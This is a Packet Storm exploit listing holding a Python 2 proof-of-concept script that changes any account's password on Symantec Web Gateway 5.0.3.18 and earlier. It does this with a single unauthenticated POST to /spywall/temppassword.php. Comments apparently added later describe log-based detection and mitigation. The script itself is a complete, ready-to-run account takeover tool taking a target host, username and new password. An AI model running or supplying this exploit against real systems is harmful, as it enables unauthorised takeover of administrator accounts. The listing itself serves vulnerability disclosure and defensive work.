packetstorm | @_Kc57 | PACKETSTORM:115782
HistoryAug 22, 2012 - 12:00 a.m.

Symantec Web Gateway 5.0.3.18 Password Change

2012-08-22 00:00:00
@_Kc57
packetstormsecurity.com
34

0.009 Low

EPSS

Percentile

82.6%

`#!/usr/bin/python  
  
import urllib  
import urllib2  
import re  
import sys  
  
# Proof-of-concept for the password-change issue named in the banner below.
# It is a Python 2 script (print statements, urllib2).
# NOTE(review): the listing lost its indentation in extraction; the bodies of
# the `if`/`else` statements below appear at column 0 here.
#
# What the script shows, for defenders: one form POST to
# /spywall/temppassword.php with a username and a new password. The script
# sends no current password, cookie or token. It reports success when the
# response body contains the confirmation string it searches for.
#
# Detection: review the appliance's web access logs for POSTs to
# /spywall/temppassword.php, especially from clients outside the admin
# network, and correlate with unexpected administrator password changes.
# Mitigation: the banner gives affected releases as <= 5.0.3.18. Apply the
# vendor's fixed release (version not stated on this page -- confirm against
# the vendor advisory) and restrict the management interface to trusted hosts.
print "[*] ###########################################################"  
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"  
print "[*] @_Kc57"  
print "[*] ###########################################################\n"  
  
  
# Exactly three arguments are required: host, account name, new password.
# On a wrong argument count the script prints usage and exits with status 0.
if (len(sys.argv) != 4):  
print "Usage: poc.py <RHOST> <username> <newpassword>"  
exit(0)  
  
ip = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
  
# The endpoint is addressed over HTTPS on the host given on the command line.
url = "https://%s/spywall/temppassword.php" % (ip)  
  
# Form fields submitted to the endpoint. None of them carries the account's
# existing password or any session identifier.
opts = {  
# presumably the page shown after the change -- not established by this listing
'target':'executive_summary.php',  
'USERNAME':username,  
'password':password,  
'password2':password,  
'Save':'Save'  
}  
  
print "[*] Sending request to server..."  
  
# Passing `data` to urllib2.Request makes this a POST with a
# form-urlencoded body. No extra headers or cookies are attached.
data = urllib.urlencode(opts)  
request = urllib2.Request(url, data)  
response = urllib2.urlopen(request)  
  
# Success is inferred only from this confirmation text in the response body.
# The same string can serve as a response-side indicator in proxy captures.
match = re.search('Your new password has been saved', response.read())  
  
if(match):  
print "[*] Password for %s changed to %s" %(username,password)  
else:  
print "[*] Password change failed!"  
  
`
